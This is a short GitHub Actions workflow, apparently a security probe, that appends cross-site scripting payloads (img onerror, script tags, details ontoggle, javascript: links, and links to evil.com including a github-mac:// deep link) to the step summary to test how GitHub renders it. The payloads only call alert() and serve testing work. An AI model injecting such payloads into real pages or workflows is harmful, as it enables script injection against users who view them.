name: Step Summary XSS
on: [workflow_dispatch]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - name: XSS in summary
        run: |
          cat >> $GITHUB_STEP_SUMMARY << 'EOF'
          <img src=x onerror=alert(1)>
          <script>alert(2)</script>
          <details open ontoggle=alert(3)>x</details>
          <div action="https://evil.com" accesskey="x" tabindex=0>action</div>
          <a href="javascript:alert(4)">click</a>
          <a href="github-mac://openRepo/https://evil.com">desktop</a>
          EOF
